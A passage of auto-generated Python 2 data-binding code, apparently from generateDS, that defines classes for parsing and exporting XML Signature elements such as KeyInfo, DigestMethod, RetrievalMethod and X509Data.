outfile.write('Algorithm="%s",\n' % (self.Algorithm,))
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
if node.text is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', node.text)
self.content_.append(obj_)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Algorithm', node)
if value is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
self.Algorithm = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == '':
obj_ = __ANY__.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, '', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_'):
self.add_(obj_.value)
elif hasattr(self, 'set_'):
self.set_(obj_.value)
elif nodeName_ == 'XPath' and child_.text is not None:
valuestr_ = child_.text
obj_ = self.mixedclass_(MixedContainer.CategorySimple,
MixedContainer.TypeString, 'XPath', valuestr_)
self.content_.append(obj_)
if not fromsubclass_ and child_.tail is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', child_.tail)
self.content_.append(obj_)
# end class TransformType
class DigestMethodType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Algorithm=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
self.Algorithm = _cast(None, Algorithm)
if anytypeobjs_ is None:
self.anytypeobjs_ = []
else:
self.anytypeobjs_ = anytypeobjs_
self.valueOf_ = valueOf_
if mixedclass_ is None:
self.mixedclass_ = MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if DigestMethodType.subclass:
return DigestMethodType.subclass(*args_, **kwargs_)
else:
return DigestMethodType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
def insert_anytypeobjs_(self, index, value): self._anytypeobjs_[index] = value
def get_Algorithm(self): return self.Algorithm
def set_Algorithm(self, Algorithm): self.Algorithm = Algorithm
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.anytypeobjs_ or
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='DigestMethodType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='DigestMethodType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='DigestMethodType'):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
outfile.write(' Algorithm=%s' % (self.gds_format_string(quote_attrib(self.Algorithm).encode(ExternalEncoding), input_name='Algorithm'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='DigestMethodType', fromsubclass_=False, pretty_print=True):
if not fromsubclass_:
for item_ in self.content_:
item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='DigestMethodType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
showIndent(outfile, level)
outfile.write('Algorithm="%s",\n' % (self.Algorithm,))
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
if node.text is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', node.text)
self.content_.append(obj_)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Algorithm', node)
if value is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
self.Algorithm = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == '':
obj_ = __ANY__.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, '', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_'):
self.add_(obj_.value)
elif hasattr(self, 'set_'):
self.set_(obj_.value)
if not fromsubclass_ and child_.tail is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', child_.tail)
self.content_.append(obj_)
# end class DigestMethodType
class KeyInfoType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, KeyName=None, KeyValue=None, RetrievalMethod=None, X509Data=None, PGPData=None, SPKIData=None, MgmtData=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
self.Id = _cast(None, Id)
if KeyName is None:
self.KeyName = []
else:
self.KeyName = KeyName
if KeyValue is None:
self.KeyValue = []
else:
self.KeyValue = KeyValue
if RetrievalMethod is None:
self.RetrievalMethod = []
else:
self.RetrievalMethod = RetrievalMethod
if X509Data is None:
self.X509Data = []
else:
self.X509Data = X509Data
if PGPData is None:
self.PGPData = []
else:
self.PGPData = PGPData
if SPKIData is None:
self.SPKIData = []
else:
self.SPKIData = SPKIData
if MgmtData is None:
self.MgmtData = []
else:
self.MgmtData = MgmtData
self.anytypeobjs_ = anytypeobjs_
self.valueOf_ = valueOf_
if mixedclass_ is None:
self.mixedclass_ = MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if KeyInfoType.subclass:
return KeyInfoType.subclass(*args_, **kwargs_)
else:
return KeyInfoType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_KeyName(self): return self.KeyName
def set_KeyName(self, KeyName): self.KeyName = KeyName
def add_KeyName(self, value): self.KeyName.append(value)
def insert_KeyName(self, index, value): self.KeyName[index] = value
def get_KeyValue(self): return self.KeyValue
def set_KeyValue(self, KeyValue): self.KeyValue = KeyValue
def add_KeyValue(self, value): self.KeyValue.append(value)
def insert_KeyValue(self, index, value): self.KeyValue[index] = value
def get_RetrievalMethod(self): return self.RetrievalMethod
def set_RetrievalMethod(self, RetrievalMethod): self.RetrievalMethod = RetrievalMethod
def add_RetrievalMethod(self, value): self.RetrievalMethod.append(value)
def insert_RetrievalMethod(self, index, value): self.RetrievalMethod[index] = value
def get_X509Data(self): return self.X509Data
def set_X509Data(self, X509Data): self.X509Data = X509Data
def add_X509Data(self, value): self.X509Data.append(value)
def insert_X509Data(self, index, value): self.X509Data[index] = value
def get_PGPData(self): return self.PGPData
def set_PGPData(self, PGPData): self.PGPData = PGPData
def add_PGPData(self, value): self.PGPData.append(value)
def insert_PGPData(self, index, value): self.PGPData[index] = value
def get_SPKIData(self): return self.SPKIData
def set_SPKIData(self, SPKIData): self.SPKIData = SPKIData
def add_SPKIData(self, value): self.SPKIData.append(value)
def insert_SPKIData(self, index, value): self.SPKIData[index] = value
def get_MgmtData(self): return self.MgmtData
def set_MgmtData(self, MgmtData): self.MgmtData = MgmtData
def add_MgmtData(self, value): self.MgmtData.append(value)
def insert_MgmtData(self, index, value): self.MgmtData[index] = value
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def get_Id(self): return self.Id
def set_Id(self, Id): self.Id = Id
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.KeyName or
self.KeyValue or
self.RetrievalMethod or
self.X509Data or
self.PGPData or
self.SPKIData or
self.MgmtData or
self.anytypeobjs_ is not None or
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='KeyInfoType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='KeyInfoType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='KeyInfoType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='KeyInfoType', fromsubclass_=False, pretty_print=True):
if not fromsubclass_:
for item_ in self.content_:
item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='KeyInfoType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
showIndent(outfile, level)
outfile.write('Id="%s",\n' % (self.Id,))
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
if node.text is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', node.text)
self.content_.append(obj_)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'KeyName' and child_.text is not None:
valuestr_ = child_.text
obj_ = self.mixedclass_(MixedContainer.CategorySimple,
MixedContainer.TypeString, 'KeyName', valuestr_)
self.content_.append(obj_)
elif nodeName_ == 'KeyValue':
obj_ = KeyValue.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, 'KeyValue', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_KeyValue'):
self.add_KeyValue(obj_.value)
elif hasattr(self, 'set_KeyValue'):
self.set_KeyValue(obj_.value)
elif nodeName_ == 'RetrievalMethod':
obj_ = RetrievalMethod.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, 'RetrievalMethod', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_RetrievalMethod'):
self.add_RetrievalMethod(obj_.value)
elif hasattr(self, 'set_RetrievalMethod'):
self.set_RetrievalMethod(obj_.value)
elif nodeName_ == 'X509Data':
obj_ = X509Data.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, 'X509Data', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_X509Data'):
self.add_X509Data(obj_.value)
elif hasattr(self, 'set_X509Data'):
self.set_X509Data(obj_.value)
elif nodeName_ == 'PGPData':
obj_ = PGPData.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, 'PGPData', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_PGPData'):
self.add_PGPData(obj_.value)
elif hasattr(self, 'set_PGPData'):
self.set_PGPData(obj_.value)
elif nodeName_ == 'SPKIData':
obj_ = SPKIData.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, 'SPKIData', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_SPKIData'):
self.add_SPKIData(obj_.value)
elif hasattr(self, 'set_SPKIData'):
self.set_SPKIData(obj_.value)
elif nodeName_ == 'MgmtData' and child_.text is not None:
valuestr_ = child_.text
obj_ = self.mixedclass_(MixedContainer.CategorySimple,
MixedContainer.TypeString, 'MgmtData', valuestr_)
self.content_.append(obj_)
elif nodeName_ == '':
obj_ = __ANY__.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, '', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_'):
self.add_(obj_.value)
elif hasattr(self, 'set_'):
self.set_(obj_.value)
if not fromsubclass_ and child_.tail is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', child_.tail)
self.content_.append(obj_)
# end class KeyInfoType
class KeyValueType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, DSAKeyValue=None, RSAKeyValue=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
self.DSAKeyValue = DSAKeyValue
self.RSAKeyValue = RSAKeyValue
self.anytypeobjs_ = anytypeobjs_
self.valueOf_ = valueOf_
if mixedclass_ is None:
self.mixedclass_ = MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if KeyValueType.subclass:
return KeyValueType.subclass(*args_, **kwargs_)
else:
return KeyValueType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_DSAKeyValue(self): return self.DSAKeyValue
def set_DSAKeyValue(self, DSAKeyValue): self.DSAKeyValue = DSAKeyValue
def get_RSAKeyValue(self): return self.RSAKeyValue
def set_RSAKeyValue(self, RSAKeyValue): self.RSAKeyValue = RSAKeyValue
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.DSAKeyValue is not None or
self.RSAKeyValue is not None or
self.anytypeobjs_ is not None or
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='KeyValueType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='KeyValueType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='KeyValueType'):
pass
def exportChildren(self, outfile, level, namespace_='ds:', name_='KeyValueType', fromsubclass_=False, pretty_print=True):
if not fromsubclass_:
for item_ in self.content_:
item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='KeyValueType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
if node.text is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', node.text)
self.content_.append(obj_)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'DSAKeyValue':
obj_ = DSAKeyValue.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, 'DSAKeyValue', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_DSAKeyValue'):
self.add_DSAKeyValue(obj_.value)
elif hasattr(self, 'set_DSAKeyValue'):
self.set_DSAKeyValue(obj_.value)
elif nodeName_ == 'RSAKeyValue':
obj_ = RSAKeyValue.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, 'RSAKeyValue', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_RSAKeyValue'):
self.add_RSAKeyValue(obj_.value)
elif hasattr(self, 'set_RSAKeyValue'):
self.set_RSAKeyValue(obj_.value)
elif nodeName_ == '':
obj_ = __ANY__.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, '', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_'):
self.add_(obj_.value)
elif hasattr(self, 'set_'):
self.set_(obj_.value)
if not fromsubclass_ and child_.tail is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', child_.tail)
self.content_.append(obj_)
# end class KeyValueType
class RetrievalMethodType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Type=None, URI=None, Transforms=None):
self.Type = _cast(None, Type)
self.URI = _cast(None, URI)
self.Transforms = Transforms
def factory(*args_, **kwargs_):
if RetrievalMethodType.subclass:
return RetrievalMethodType.subclass(*args_, **kwargs_)
else:
return RetrievalMethodType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Transforms(self): return self.Transforms
def set_Transforms(self, Transforms): self.Transforms = Transforms
def get_Type(self): return self.Type
def set_Type(self, Type): self.Type = Type
def get_URI(self): return self.URI
def set_URI(self, URI): self.URI = URI
def hasContent_(self):
if (
self.Transforms is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='RetrievalMethodType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='RetrievalMethodType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='RetrievalMethodType'):
if self.Type is not None and 'Type' not in already_processed:
already_processed.add('Type')
outfile.write(' Type=%s' % (self.gds_format_string(quote_attrib(self.Type).encode(ExternalEncoding), input_name='Type'), ))
if self.URI is not None and 'URI' not in already_processed:
already_processed.add('URI')
outfile.write(' URI=%s' % (self.gds_format_string(quote_attrib(self.URI).encode(ExternalEncoding), input_name='URI'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='RetrievalMethodType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Transforms is not None:
self.Transforms.export(outfile, level, namespace_, name_='Transforms', pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='RetrievalMethodType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.Type is not None and 'Type' not in already_processed:
already_processed.add('Type')
showIndent(outfile, level)
outfile.write('Type="%s",\n' % (self.Type,))
if self.URI is not None and 'URI' not in already_processed:
already_processed.add('URI')
showIndent(outfile, level)
outfile.write('URI="%s",\n' % (self.URI,))
def exportLiteralChildren(self, outfile, level, name_):
if self.Transforms is not None:
showIndent(outfile, level)
outfile.write('Transforms=model_.Transforms(\n')
self.Transforms.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Type', node)
if value is not None and 'Type' not in already_processed:
already_processed.add('Type')
self.Type = value
value = find_attr_value_('URI', node)
if value is not None and 'URI' not in already_processed:
already_processed.add('URI')
self.URI = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Transforms':
obj_ = TransformsType.factory()
obj_.build(child_)
self.Transforms = obj_
# end class RetrievalMethodType
class X509DataType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, X509IssuerSerial=None, X509SKI=None, X509SubjectName=None, X509Certificate=None, X509CRL=None, anytypeobjs_=None):
self.X509IssuerSerial = X509IssuerSerial
self.X509SKI = X509SKI
self.X509SubjectName = X509SubjectName
self.X509Certificate = X509Certificate
self.X509CRL = X509CRL
self.anytypeobjs_ = anytypeobjs_
def factory(*args_, **kwargs_):
if X509DataType.subclass:
return X509DataType.subclass(*args_, **kwargs_)
else:
return X509DataType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_X509IssuerSerial(self): return self.X509IssuerSerial
def set_X509IssuerSerial(self, X509IssuerSerial): self.X509IssuerSerial = X509IssuerSerial
def get_X509SKI(self): return self.X509SKI
def set_X509SKI(self, X509SKI): self.X509SKI = X509SKI
def get_X509SubjectName(self): return self.X509SubjectName
def set_X509SubjectName(self, X509SubjectName): self.X509SubjectName = X509SubjectName
def get_X509Certificate(self): return self.X509Certificate
def set_X509Certificate(self, X509Certificate): self.X509Certificate = X509Certificate
def get_X509CRL(self): return self.X509CRL
def set_X509CRL(self, X509CRL): self.X509CRL = X509CRL
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def hasContent_(self):
if (
self.X509IssuerSerial is not None or
self.X509SKI is not None or
self.X509SubjectName is not None or
self.X509Certificate is not None or
self.X509CRL is not None or
self.anytypeobjs_ is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='X509DataType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='X509DataType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='X509DataType'):
pass
def exportChildren(self, outfile, level, namespace_='ds:', name_='X509DataType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.X509IssuerSerial is not None:
self.X509IssuerSerial.export(outfile, level, namespace_, name_='X509IssuerSerial', pretty_print=pretty_print)
if self.X509SKI is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sX509SKI>%s</%sX509SKI>%s' % (namespace_, self.gds_format_base64(self.X509SKI, input_name='X509SKI'), namespace_, eol_))
if self.X509SubjectName is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sX509SubjectName>%s</%sX509SubjectName>%s' % (namespace_, self.gds_format_string(quote_xml(self.X509SubjectName).encode(ExternalEncoding), input_name='X509SubjectName'), namespace_, eol_))
if self.X509Certificate is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sX509Certificate>%s</%sX509Certificate>%s' % (namespace_, self.gds_format_base64(self.X509Certificate, input_name='X509Certificate'), namespace_, eol_))
if self.X509CRL is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sX509CRL>%s</%sX509CRL>%s' % (namespace_, self.gds_format_base64(self.X509CRL, input_name='X509CRL'), namespace_, eol_))
if self.anytypeobjs_ is not None:
self.anytypeobjs_.export(outfile, level, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='X509DataType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.X509IssuerSerial is not None:
showIndent(outfile, level)
outfile.write('X509IssuerSerial=model_.X509IssuerSerialType(\n')
self.X509IssuerSerial.exportLiteral(outfile, level, name_='X509IssuerSerial')
showIndent(outfile, level)
outfile.write('),\n')
if self.X509SKI is not None:
showIndent(outfile, level)
outfile.write('X509SKI=model_.base64Binary(\n')
self.X509SKI.exportLiteral(outfile, level, name_='X509SKI')
showIndent(outfile, level)
outfile.write('),\n')
if self.X509SubjectName is not None:
showIndent(outfile, level)
outfile.write('X509SubjectName=%s,\n' % quote_python(self.X509SubjectName).encode(ExternalEncoding))
if self.X509Certificate is not None:
showIndent(outfile, level)
outfile.write('X509Certificate=model_.base64Binary(\n')
self.X509Certificate.exportLiteral(outfile, level, name_='X509Certificate')
showIndent(outfile, level)
outfile.write('),\n')
if self.X509CRL is not None:
showIndent(outfile, level)
outfile.write('X509CRL=model_.base64Binary(\n')
self.X509CRL.exportLiteral(outfile, level, name_='X509CRL')
showIndent(outfile, level)
outfile.write('),\n')
if self.anytypeobjs_ is not None:
showIndent(outfile, level)
outfile.write('anytypeobjs_=model_.anytypeobjs_(\n')
self.anytypeobjs_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'X509IssuerSerial':
obj_ = X509IssuerSerialType.factory()
obj_.build(child_)
self.X509IssuerSerial = obj_
elif nodeName_ == 'X509SKI':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
